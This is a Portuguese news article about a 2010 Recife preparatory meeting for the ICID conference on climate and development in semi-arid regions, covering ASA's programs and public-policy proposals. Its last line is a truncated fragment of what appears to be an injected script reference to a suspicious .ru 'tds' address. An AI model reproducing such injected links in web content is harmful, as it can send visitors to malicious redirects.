Terminou nesta quarta-feira (16) o Encontro Preparatório do Nordeste para a 2ª Conferência Internacional: clima, sustentabilidade e desenvolvimento em região semiáridas (ICID 2010). O evento foi realizado na Fundação Joaquim Nabuco (Fundaj), em Recife (PE).
A atividade foi dividida em quatro grupos de trabalho, que trabalharam cada um, uma temática específica. O grupo “Governança: representação, direitos, equidade e justiça” contou com a presença de seis palestrantes que apresentaram experiências exitosas na região Semiárida, dentre elas, a experiência da ASA.
O coordenador executivo da ASA, José Aldo dos Santos, explicou como a Articulação, através dos seus programas, tem contribuído para a construção de um Semiárido sustentável e como essas ações têm ajudado a construir políticas públicas para a região.
José Aldo acredita que as experiências desenvolvidas através dos programas da ASA podem contribuir nesse debate. “Essas experiências permitem que as famílias pensem na estocagem de água e de alimentos. Mas também permite que elas trabalhem em um processo de gestão das políticas públicas de forma descentralizada”, afirmou o coordenador.
As outras experiências apresentadas durante este momento foram: O Pacto das Águas do Ceará, a experiência da ONG Caatinga, que faz parte da ASA em Pernambuco, o Selo UNICEF Município aprovado, a Bodega da Caatinga e o Programa de Ação Estadual para o Combate à desertificação e Mitigação aos Efeitos da Seca.
“Esse evento tem uma importância fundamental para que a gente possa levar a uma reflexão com um olhar mais centrado no nosso Semiárido, focando a questão do desenvolvimento com sustentabilidade, e tomando a dimensão do clima como uma referência”, explica a pesquisadora da Fundaj, Edineida Cavalcanti, que coordenou essa mesa.
A perspectiva é montar uma agenda propositiva de políticas públicas baseadas nas experiências já existentes e nas tecnologias usadas no Semiárido nordestino, para ser encaminhada à Conferência Internacional, que será realizada em agosto, no Ceará.
ICID 2010
Cerca de 2.000 participantes de mais de 60 países devem participar da ICID 2010, que será realizado em agosto, em Fortaleza, no Ceará. A Conferência Internacional pretende discutir os desafios de desenvolvimento sustentável que enfrentam as regiões secas (áridas, semiáridas e subúmidas secas), diante das mudanças ambientais e climáticas em andamento.
Os resultados e recomendações da ICID 2010 serão uma contribuição dos participantes da ICID para a Conferência de Cúpula das Nações Unidas sobre Meio Ambiente e Desenvolvimento, a Rio + 20, que se realizará no Rio de Janeiro em 2012. Mais informações podem ser encontradas no site da Conferência: www.icid18.org .
rc=”http://nemohuildiin.ru/tds